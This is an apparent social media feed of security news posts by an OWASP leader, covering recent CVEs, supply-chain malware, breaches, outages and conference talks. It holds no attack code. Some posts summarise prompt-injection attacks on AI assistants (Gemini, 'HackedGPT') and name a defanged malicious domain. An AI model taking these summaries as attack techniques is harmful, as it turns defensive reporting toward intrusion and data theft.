Sam Stepanyan
OWASP London Chapter Leader. #OWASP Global Board Member. OWASP #Nettacker Project Leader. #AppSec Consultant, #CISSP. Follow me on Twitter/X and Mastodon twitter.com/securestep9 infosec.exchange/@securestep9
- #ReactNative: Critical vulnerability in Metro server for #React Native CVE-2025-11953 allows unauthenticated attackers to execute arbitrary OS commands via a POST request is actively exploited - patch now! #Metro4Shell #SoftwareSupplyChainSecurity 👇 www.bleepingcomputer.com/news/securit...
- The number of startups, products and workflows built on #chatGPT-4.x models is huge! This is your reminder that #OpenAI will be *retiring all* gpt-4.x, o4-mini and some gpt-5 models next week on February 13th, 2026 🍿: #AIBOM 👇 help.openai.com/en/a...
- #Notepad++ Official Update Mechanism Was Hijacked to Deliver Malware. Notepad++ downloads between September 2 - December 2, 2025 were diverted to malicious servers. #SoftwareSupplyChainSecurity 👇
- #AI on Australian travel company website sends tourists to nonexistent hot springs, describing a non-existing site as a “tranquil haven" rated “favourite among hikers", causing "droves of tourists" turning up in places with no services/cell coverage:
- #Ivanti: Two Ivanti EPMM #ZeroDay Unauthenticated #RCE Vulnerabilities CVE-2026-1281 & CVE-2026-1340 Actively Exploited, Patch Now! 👇 thehackernews.com/2026/01/two-...
- #OpenSSL Critical Vulnerabilities Allow Remote Attackers to Execute Malicious Code (CVE-2025-15467). Patches released: 👇 cybersecuritynews.com/openssl-vuln...
- Reposted by Sam Stepanyan[Not loaded yet]
- #ESA: European Space Agency's cybersecurity in freefall as yet another breach exposes spacecraft and mission data: #databreach 👇
- #Python : Malicious #PyPI Package called 'sympy-dev' Impersonates #SymPy, Deploys XMRig Miner on Linux Hosts: #SoftwareSupplyChainSecurity 👇
- Reposted by Sam Stepanyan[Not loaded yet]
- #telnet: Critical telnetd #Vulnerability CVE-2026-24061 Lets Attackers Bypass Login and Gain Root Access on systems running GNU InetUtils since version 1.9.3 up to and including version 2.7. The vulnerability went unnoticed for nearly 11 years. 👇
- #jsPDF: Critical Path Traversal Vulnerability (CVE-2025-68428) in jsPDF - a widely-adopted #npm package for generating PDF documents in JavaScript applications allows attackers to read & exfiltrate arbitrary files from the local filesystem: 👇
- Reposted by Sam Stepanyan[Not loaded yet]
- #TrustWallet: in a potential supply chain attack TrustWallet browser extension is compromised in the latest update with injected malicious code quietly sending the wallet's seed phrase to malicious domain named "metrics-trustwallet(.)com"- registered only a few days ago 👇 www.ccn.com/education/cr...
- #MongoDB and MongoDB Server multiple versions are vulnerable to Remote Code Execution (#RCE) #vulnerability CVE-2025-14847 and may be abused by unauthenticated threat actors in low-complexity attacks that don't require user interaction. Patch now! 👇 www.bleepingcomputer.com/news/securit...
- Reposted by Sam Stepanyan[Not loaded yet]
- #n8n: Critical CVSS 10.0 Remote Code Execution (#RCE) #Vulnerability in n8n via expression injection. Users advised to upgrade to version 1.122.0 or later immediately: github.com/n8n-io/n8n/s...
- #Gemini Zero-Click #Vulnerability Let Attackers Access Gmail, Calendar, and Docs. No clicks or warnings were needed. An attacker simply shared a poisoned Google Doc, Calendar invite, or email embedding hidden prompt injections. #AISecurity 👇 cybersecuritynews.com?p=135749
- If you missed @shehackspurple.bsky.social 's talk "30 Tips for Secure #JavaScript" at the @owasplondon.bsky.social meetup last week - you can watch the recording on the #OWASPLondon YouTube channel [please subscribe!]:
- #Swiss government urges citizens to ditch #Microsoft365 and other #Cloud providers due to lack of proper E2E encryption citing US Cloud Act requirement to hand over data to US authorities, even if it’s stored in Switzerland: #DataSecurity 👇 www.techradar.com/pro/security...
- #Wordpress: 100,000+ WordPress Websites Affected by Remote Code Execution (#RCE) #vulnerability in Advanced Custom Fields Plugin: 👇 www.wordfence.com/blog/2025/12...
- #VSCode: 24 malicious VS Code and #OpenVSX extensions are stealing developer credentials - spreading through popular names like Flutter, React, and Tailwind. Full list of malicious VSCode extensions in the article below: #SoftwareSupplyChainSecurity 👇
- #npm: Malicious NPM Package eslint-plugin-unicorn-ts-2 Uses Hidden Prompt and Script to Evade #AI Security Tools: #SoftwareSupplyChainSecurity 👇
- #OpenAI API Data Breach: OpenAI has disclosed a #databreach affecting some API customers due to a hack at third-party vendor #Mixpanel. What was exposed: Names & Emails, Approximate Location, UserID/Org IDs 👇
- #Maven: hundreds of packages just got caught running Shai-Hulud v2 - the same malware that hijacked npm two days ago. It spread through automated rebuilds, infecting devs who never used npm stealing & leaking secrets across thousands of GitHub repos: 👇 thehackernews.com/2025/11/shai...
- Reposted by Sam Stepanyan[Not loaded yet]
- Reposted by Sam Stepanyan[Not loaded yet]
- Over 80,000 files with #passwords and keys from governments, banks, and tech firms were found online pasted into public code tools like #JSONFormatter and #CodeBeautify. Cybercriminals are already scraping and using the data. And yes - it’s still live! 👇 thehackernews.com/2025/11/year...
- #NPM: Second Shai-Hulud Infection Wave Affects 25,000+ Repositories via npm Preinstall Credential Theft: #SoftwareSupplyChainSecurity 👇
- Reposted by Sam Stepanyan[Not loaded yet]
- #AWS launched Agentic AI Security Scoping Matrix – a framework designed to help organizations securely deploy autonomous AI systems: #AISecurity 👇
- #WhatsApp: Largest data leak in history - the entire directory of 3.5bln of WhatsApp users was available online unprotected for retrieval. Austrian researchers were able to download all phone numbers, profile pictures & data including public keys: 👇 www.heise.de/en/news/3-5-...
- #GitHub: Downdetector and social media platforms are currently filled with reports about a GitHub outage, and the official GitHub Status portal has confirmed the problem: #GitHubDown 👇
- #Cloudflare: A Cloudflare outage is taking down big parts of the internet: #CloudflareDown 👇
- #Fortinet: Critical vulnerability in Fortinet FortiWeb (CVE-2025-64446), is under active exploitation - CISA adds it to KEV catalog:
- #NPM: Over 67,000 Fake npm Packages Flood Registry in Worm-Like Spam Attack Exposing Major Security Gaps: 👇
- #Linux: Rust-based sudo-rs Affected By Multiple Security Vulnerabilities - Impacting #Ubuntu 25.10 including partial password exposure (CVE-2025-64170) and incorrect User ID in timestamps. Patches for both issues have been released: 👇 www.phoronix.com/news/sudo-rs...
- #NPM: Malicious NPM Package @acitons/artifact With 206K+ Downloads Stole GitHub Tokens: 👇 hackread.com/fake-npm-pac...
- Many thanks to everyone who attended my OWASP #Nettacker talk at the #OWASP Global AppSec 2025 Conference in Washington, DC. 👉https://github.com/OWASP/Nettacker
- #SAP: Patches 3 Critical Vulnerabilities (CVSS 10.0) Including RCE / Code Injection and Hardcoded Credentials affecting SQL Anywhere Monitor (Non-GUI), SAP NetWeaver AS Java, and SAP Solution Manager:(CVE-2025-42890, CVE-2025-42944, CVE-2025-42887): 👇 securityonline.info/sap-november...
- #NPM:Popular JavaScript library expr-eval is vulnerable to RCE #vulnerability CVE-2025-1273. Impacted software developers are advised to migrate immediately to expr-eval-fork v3.0.0 and republish their libraries: #SoftwareSupplyChainSecurity 👇 www.bleepingcomputer.com/news/securit...
- #AI: HackedGPT: Novel AI Vulnerabilities Open the Door for Private Data Leakage: unique indirect prompt injections, exfiltration of personal user information, persistence, evasion, and bypass of safety mechanisms: #AISecurity www.tenable.com/blog...
- #Kubernetes: Newly disclosed #vulnerabilities in the #runC container runtime used in #Docker & Kubernetes (CVE-2025-31133, CVE-2025-52565, CVE-2025-52881) could be exploited to bypass isolation restrictions & get access to the host system (escape): #k8s 👇 www.bleepingcomputer.com/news/securit...
- #Django: Critical SQL Injection Vulnerability in Django (CVE-2025-64459): www.endorlabs.com/learn/critic...
- #NPM: Details have emerged about a now-patched critical security vulnerability in the popular "@react-native-community/cli" npm package that could be potentially exploited to run malicious operating system commands: #Software SupplyChainSecurity 👇
- #Wordpress: CVE-2025-11833 (CVSS 9.8) Critical Flaw in #PostSMTP Plugin Exposes 400,000+ WordPress Sites to Unauthenticated Account Takeover: 👇
- #MicrosoftDown: ⚠️ Microsoft down? Major outage hits Azure Cloud, 365 and more - even Minecraft and Xbox affected: #AzureDown www.techradar.com/pro/live/mic...
- #MarksandSpencer: British retail giant M&S terminates contract with Indian outsourcer #TCS after losing over £300mln in a cyberattack blamed on the failures of the outsourced IT helpdesk which was tricked by a social engineering by the Scattered Spider group: www.computing.co.uk/news/2025/se...
- #Formula1: An API vulnerability in the FIA driver portal exposed Formula 1 drivers’ personal data including passports and licenses. Anyone could become an “admin” with a single API request: #APISecurity 👇 ian.sh/fia
- If you are attending #OWASP #LASCON (@LASCONATX) 2025 Conference in Austin, Texas don't miss my talk on the OWASP #Nettacker Project at 1pm CDT in the Read Oak Ballroom: lascon.org/schedule/
- #OWASP LASCON Conference is starting with Jeff Williams's keynote about the flawed mindset holding security back: #LASCON
- #MCP: Critical Vulnerability in a popular MCP Server Platform #Smithery Exposes 3,000+ Servers and Thousands of API Keys: #AISecurity 👇
- #AWS: Massive global #outage takes out a huge chunk of the internet with many sites and services down: #Cloud #CloudDown #AWSDown www.bbc.com/news/live/c5...
- I am running for re-election to the OWASP Global Board of Directors in 2025. 🗳️OWASP Global Board Elections have started and all OWASP Members should have received an email with the e-ballot yesterday. owasp.org/www-board-ca... Thank you for your support!
- #F5: #CISA warns of ‘significant’ threat to federal networks after a massive #databreach as nation-state hackers stole F5 source code, undisclosed bug info and stayed undetected inside F5 product development network for several months: therecord.media/cisa-directi...
- #Redis: A13-Year-Old Vulnerability CVE-2025-49844 dubbed #RediShell: CVSS 10.0 Vulnerability Lets Attackers Run Code Remotely (#RCE) in Redis versions used in 75% of Cloud environments! Update your Redis Immediately!
